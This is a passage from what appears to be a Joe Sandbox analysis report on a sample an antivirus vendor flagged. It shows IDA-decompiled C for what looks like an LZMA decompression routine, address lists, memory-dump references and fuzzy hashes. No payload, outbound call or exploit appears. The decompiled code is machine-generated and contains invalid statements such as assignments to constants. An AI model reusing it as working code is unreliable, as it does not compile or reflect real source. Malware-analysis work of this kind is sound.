												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t613 - 0x88) = _t533;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L80;
											case 0x1b:
												L76:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t275 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t275;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t284 = __ebp - 0x64;
												 *_t284 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t284;
												 *( *(__ebp - 0x68)) = __cl;
												L80:
												 *(__ebp - 0x14) = __edx;
												goto L81;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L81:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t535 = _t534 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}

0x00000000
0x0040711c
0x0040711c
0x00407120
0x0040712d
0x00407137
0x00000000
0x00407122
0x00407122
0x0040715d
0x00407160
0x00407163
0x00407166
0x00407166
0x00407169
0x00407170
0x00407175
0x00407056
0x00407059
0x004073cb
0x004073cb
0x004073cb
0x004073ce
0x004073ce
0x004073ce
0x004073d4
0x004073da
0x004073e0
0x004073fa
0x004073fd
0x00407403
0x0040740e
0x00407410
0x004073e2
0x004073e2
0x004073f1
0x004073f5
0x004073f5
0x0040741a
0x00000000
0x00000000
0x0040741c
0x00407420
0x004075cf
0x004075e5
0x004075ed
0x004075f4
0x004075f6
0x004075fd
0x00407601
0x00407601
0x0040742c
0x00407433
0x0040743b
0x0040743e
0x00407441
0x00407441
0x00407447
0x00407447
0x00406be3
0x00406be3
0x00406be3
0x00406bec
0x00000000
0x00000000
0x00406bf2
0x00000000
0x00406bfd
0x00000000
0x00000000
0x00406c06
0x00406c09
0x00406c0c
0x00406c10
0x00000000
0x00000000
0x00406c16
0x00406c19
0x00406c1b
0x00406c1c
0x00406c1f
0x00406c21
0x00406c22
0x00406c24
0x00406c27
0x00406c2c
0x00406c31
0x00406c3a
0x00406c4d
0x00406c50
0x00406c5c
0x00406c84
0x00406c86
0x00406c94
0x00406c94
0x00406c98
0x00000000
0x00000000
0x00000000
0x00000000
0x00406c88
0x00406c88
0x00406c8b
0x00406c8c
0x00406c8c
0x00000000
0x00406c88
0x00406c62
0x00406c67
0x00406c67
0x00406c70
0x00406c78
0x00406c7b
0x00000000
0x00406c81
0x00406c81
0x00000000
0x00406c81
0x00000000
0x00406c9e
0x00406c9e
0x00406ca2
0x0040754e
0x00000000
0x0040754e
0x00406cab
0x00406cbb
0x00406cbe
0x00406cc1
0x00406cc1
0x00406cc1
0x00406cc4
0x00406cc8
0x00000000
0x00000000
0x00406cca
0x00406cd0
0x00406cfa
0x00406d00
0x00406d07
0x00000000
0x00406d07
0x00406cd6
0x00406cd9
0x00406cde
0x00406cde
0x00406ce9
0x00406cf1
0x00406cf4
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406d39
0x00406d3f
0x00406d42
0x00406d4f
0x00406d57
0x004073cb
0x004073cb
0x00000000
0x00000000
0x00406d0e
0x00406d0e
0x00406d12
0x0040755d
0x00000000
0x0040755d
0x00406d1e
0x00406d29
0x00406d29
0x00406d29
0x00406d2c
0x00406d2f
0x00406d32
0x00406d37
0x00000000
0x00000000
0x00000000
0x00000000
0x004073ce
0x004073ce
0x004073d4
0x004073da
0x004073e0
0x004073fa
0x004073fd
0x00407403
0x0040740e
0x00407410
0x004073e2
0x004073e2
0x004073f1
0x004073f5
0x004073f5
0x0040741a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406d5f
0x00406d61
0x00406d64
0x00406dd5
0x00406dd8
0x00406ddb
0x00406de2
0x00406dec
0x004073cb
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x004073cb
0x00406d66
0x00406d6a
0x00406d6d
0x00406d6f
0x00406d72
0x00406d75
0x00406d77
0x00406d7a
0x00406d7c
0x00406d81
0x00406d84
0x00406d87
0x00406d8b
0x00406d92
0x00406d95
0x00406d9c
0x00406da0
0x00406da8
0x00406da8
0x00406da8
0x00406da2
0x00406da2
0x00406da2
0x00406d97
0x00406d97
0x00406d97
0x00406dac
0x00406daf
0x00406dcd
0x00406dcf
0x00000000
0x00406db1
0x00406db1
0x00406db4
0x00406db7
0x00406dba
0x00406dbc
0x00406dbc
0x00406dbc
0x00406dbf
0x00406dc2
0x00406dc4
0x00406dc5
0x00406dc8
0x00000000
0x00406dc8
0x00000000
0x00406ffe
0x00407002
0x00407020
0x00407023
0x0040702a
0x0040702d
0x00407030
0x00407033
0x00407036
0x00407039
0x0040703b
0x00407042
0x00407043
0x00407045
0x00407048
0x0040704b
0x0040704e
0x0040704e
0x00407053
0x00000000
0x00407053
0x00407004
0x00407007
0x0040700a
0x00407014
0x004073cb
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x00000000
0x00407068
0x0040706c
0x0040708f
0x00407092
0x00407095
0x0040709f
0x0040706e
0x0040706e
0x00407071
0x00407074
0x00407077
0x00407084
0x00407087
0x00407087
0x004073cb
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x00000000
0x004070ab
0x004070af
0x00000000
0x00000000
0x004070b5
0x004070b9
0x00000000
0x00000000
0x004070bf
0x004070c1
0x004070c5
0x004070c5
0x004070c8
0x004070cc
0x00000000
0x00000000
0x00000000
0x00000000
0x00407143
0x00407147
0x0040714e
0x00407151
0x00407154
0x00407149
0x00407149
0x00407149
0x00407157
0x0040715a
0x00000000
0x00000000
0x00407203
0x00407203
0x00407207
0x004075a5
0x00000000
0x004075a5
0x0040720d
0x00407210
0x00407213
0x00407217
0x0040721a
0x00407220
0x00407222
0x00407222
0x00407222
0x00407225
0x00407228
0x00000000
0x00000000
0x00406df8
0x00406df8
0x00406dfc
0x00407569
0x00000000
0x00407569
0x00406e02
0x00406e05
0x00406e08
0x00406e0c
0x00406e0f
0x00406e15
0x00406e17
0x00406e17
0x00406e17
0x00406e1a
0x00406e1d
0x00406e1d
0x00406e20
0x00406e23
0x00000000
0x00000000
0x00406e29
0x00406e2f
0x00000000
0x00000000
0x00406e35
0x00406e35
0x00406e39
0x00406e3c
0x00406e3f
0x00406e42
0x00406e45
0x00406e46
0x00406e49
0x00406e4b
0x00406e51
0x00406e54
0x00406e57
0x00406e5a
0x00406e5d
0x00406e60
0x00406e63
0x00406e7f
0x00406e82
0x00406e85
0x00406e88
0x00406e8f
0x00406e93
0x00406e95
0x00406e99
0x00406e65
0x00406e65
0x00406e69
0x00406e71
0x00406e76
0x00406e78
0x00406e7a
0x00406e7a
0x00406e9c
0x00406ea3
0x00406ea6
0x00000000
0x00406eac
0x00000000
0x00406eac
0x00000000
0x00406eb1
0x00406eb1
0x00406eb5
0x00407575
0x00000000
0x00407575
0x00406ebb
0x00406ebe
0x00406ec1
0x00406ec5
0x00406ec8
0x00406ece
0x00406ed0
0x00406ed0
0x00406ed0
0x00406ed3
0x00406ed6
0x00406ed6
0x00406ed6
0x00406edc
0x00000000
0x00000000
0x00406ede
0x00406ee1
0x00406ee4
0x00406ee7
0x00406eea
0x00406eed
0x00406ef0
0x00406ef3
0x00406ef6
0x00406ef9
0x00406efc
0x00406f14
0x00406f17
0x00406f1a
0x00406f1d
0x00406f1d
0x00406f20
0x00406f24
0x00406f26
0x00406efe
0x00406efe
0x00406f06
0x00406f0b
0x00406f0d
0x00406f0f
0x00406f0f
0x00406f29
0x00406f30
0x00406f33
0x00000000
0x00406f35
0x00000000
0x00406f35
0x00406f33
0x00406f3a
0x00406f3a
0x00406f3a
0x00406f3a
0x00000000
0x00000000
0x00406f75
0x00406f75
0x00406f79
0x00407581
0x00000000
0x00407581
0x00406f7f
0x00406f82
0x00406f85
0x00406f89
0x00406f8c
0x00406f92
0x00406f94
0x00406f94
0x00406f94
0x00406f97
0x00406f9a
0x00406f9a
0x00406fa0
0x00406f3e
0x00406f3e
0x00406f41
0x00000000
0x00406f41
0x00406fa2
0x00406fa2
0x00406fa5
0x00406fa8
0x00406fab
0x00406fae
0x00406fb1
0x00406fb4
0x00406fb7
0x00406fba
0x00406fbd
0x00406fc0
0x00406fd8
0x00406fdb
0x00406fde
0x00406fe1
0x00406fe1
0x00406fe4
0x00406fe8
0x00406fea
0x00406fc2
0x00406fc2
0x00406fca
0x00406fcf
0x00406fd1
0x00406fd3
0x00406fd3
0x00406fed
0x00406ff4
0x00406ff7
0x00000000
0x00406ff9
0x00000000
0x00406ff9
0x00000000
0x00407286
0x00407286
0x0040728a
0x004075b1
0x00000000
0x004075b1
0x00407290
0x00407293
0x00407296
0x0040729a
0x0040729d
0x004072a3
0x004072a5
0x004072a5
0x004072a5
0x004072a8
0x00000000
0x00000000
0x00000000
0x00000000
0x00407395
0x00407399
0x004073bb
0x004073be
0x004073c8
0x004073cb
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x004073cb
0x0040739b
0x0040739e
0x004073a2
0x004073a5
0x004073a5
0x004073a8
0x00000000
0x00000000
0x00407452
0x00407456
0x00407474
0x00407474
0x00407474
0x0040747b
0x00407482
0x00407489
0x00407489
0x00000000
0x00407489
0x00407458
0x0040745b
0x0040745e
0x00407461
0x00407468
0x004073ac
0x004073ac
0x004073af
0x00000000
0x00000000
0x00407543
0x00407546
0x00407447
0x00000000
0x00000000
0x0040717d
0x0040717f
0x00407186
0x00407187
0x00407189
0x0040718c
0x00000000
0x00000000
0x00407194
0x00407197
0x0040719a
0x0040719c
0x0040719e
0x0040719e
0x0040719f
0x004071a2
0x004071a9
0x004071ac
0x004071ba
0x00000000
0x00000000
0x00407490
0x00407490
0x00407493
0x0040749a
0x00000000
0x00000000
0x0040749f
0x0040749f
0x004074a3
0x004075db
0x00000000
0x004075db
0x004074a9
0x004074ac
0x004074af
0x004074b3
0x004074b6
0x004074bc
0x004074be
0x004074be
0x004074be
0x004074c1
0x004074c4
0x004074c4
0x004074c4
0x004074c4
0x004074c7
0x004074c7
0x004074cb
0x0040752b
0x0040752e
0x00407533
0x00407534
0x00407536
0x00407538
0x0040753b
0x00407447
0x00407447
0x00000000
0x0040744d
0x00407447
0x004074cd
0x004074d3
0x004074d6
0x004074d9
0x004074dc
0x004074df
0x004074e2
0x004074e5
0x004074e8
0x004074eb
0x004074ee
0x00407507
0x0040750a
0x0040750d
0x00407510
0x00407514
0x00407516
0x00407516
0x00407517
0x0040751a
0x004074f0
0x004074f0
0x004074f8
0x004074fd
0x004074ff
0x00407502
0x00407502
0x0040751d
0x00407524
0x00000000
0x00407526
0x00000000
0x00407526
0x00000000
0x004071c2
0x004071c5
0x004071fb
0x0040732b
0x0040732b
0x0040732b
0x0040732b
0x0040732e
0x0040732e
0x00407331
0x00407333
0x004075bd
0x00000000
0x004075bd
0x00407339
0x0040733c
0x00000000
0x00000000
0x00407342
0x00407346
0x00407349
0x00407349
0x00407349
0x00000000
0x00407349
0x004071c7
0x004071c9
0x004071cb
0x004071cd
0x004071d0
0x004071d1
0x004071d3
0x004071d5
0x004071d8
0x004071db
0x004071f1
0x004071f6
0x0040722e
0x0040722e
0x00407232
0x0040725e
0x00407260
0x00407267
0x0040726a
0x0040726d
0x0040726d
0x00407272
0x00407272
0x00407274
0x00407277
0x0040727e
0x00407281
0x004072ae
0x004072ae
0x004072b1
0x004072b4
0x00407328
0x00407328
0x00407328
0x00000000
0x00407328
0x004072b6
0x004072bc
0x004072bf
0x004072c2
0x004072c5
0x004072c8
0x004072cb
0x004072ce
0x004072d1
0x004072d4
0x004072d7
0x004072f0
0x004072f2
0x004072f5
0x004072f6
0x004072f9
0x004072fb
0x004072fe
0x00407300
0x00407302
0x00407305
0x00407307
0x0040730a
0x0040730e
0x00407310
0x00407310
0x00407311
0x00407314
0x00407317
0x004072d9
0x004072d9
0x004072e1
0x004072e6
0x004072e8
0x004072eb
0x004072eb
0x0040731a
0x00407321
0x004072ab
0x004072ab
0x004072ab
0x004072ab
0x00000000
0x00407323
0x00000000
0x00407323
0x00407321
0x00407234
0x00407237
0x00407239
0x0040723c
0x0040723f
0x00407242
0x00407244
0x00407247
0x0040724a
0x0040724a
0x0040724d
0x0040724d
0x00407250
0x00407257
0x0040722b
0x0040722b
0x0040722b
0x0040722b
0x00000000
0x00407259
0x00000000
0x00407259
0x00407257
0x004071dd
0x004071e0
0x004071e2
0x004071e5
0x00000000
0x00000000
0x00406f44
0x00406f44
0x00406f48
0x0040758d
0x00000000
0x0040758d
0x00406f4e
0x00406f51
0x00406f54
0x00406f57
0x00406f5a
0x00406f5d
0x00406f60
0x00406f62
0x00406f65
0x00406f68
0x00406f6b
0x00406f6d
0x00406f6d
0x00406f6d
0x00000000
0x00000000
0x004070cf
0x004070cf
0x004070d3
0x00407599
0x00000000
0x00407599
0x004070d9
0x004070dc
0x004070df
0x004070e2
0x004070e4
0x004070e4
0x004070e4
0x004070e7
0x004070ea
0x004070ed
0x004070f0
0x004070f3
0x004070f6
0x004070f7
0x004070f9
0x004070f9
0x004070f9
0x004070fc
0x004070ff
0x00407102
0x00407105
0x00407105
0x00407105
0x00407108
0x0040710a
0x0040710a
0x00000000
0x00000000
0x0040734c
0x0040734c
0x0040734c
0x00407350
0x00000000
0x00000000
0x00407356
0x00407359
0x0040735c
0x0040735f
0x00407361
0x00407361
0x00407361
0x00407364
0x00407367
0x0040736a
0x0040736d
0x00407370
0x00407373
0x00407374
0x00407376
0x00407376
0x00407376
0x00407379
0x0040737c
0x0040737f
0x00407382
0x00407385
0x00407389
0x0040738b
0x0040738e
0x00000000
0x00407390
0x0040710d
0x0040710d
0x00000000
0x0040710d
0x0040738e
0x004075c3
0x00000000
0x00000000
0x00406bf2
0x004075fa
0x004075fa
0x00000000
0x004075fa
0x00407447
0x004073ce
0x004073cb
0x00000000
0x00407120

Memory Dump Source

Source File: 00000000.00000002.1921543420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1921507308.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921611621.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921654388.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921798150.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921834427.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921872103.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921924152.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921963803.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
Instruction ID: aecab3f40db1f9fc07a3dc9ea3777efa7aa3d7dc23f88bc09ddd959c6243594a
Opcode Fuzzy Hash: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
Instruction Fuzzy Hash: 2B711571D04228DBEF28CF98C8547ADBBB1FF44305F14806AD856BB281D778A986DF05

Uniqueness

Uniqueness Score: -1.00%

Function 00407068 Relevance: 5.2, APIs: 4, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00407068() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
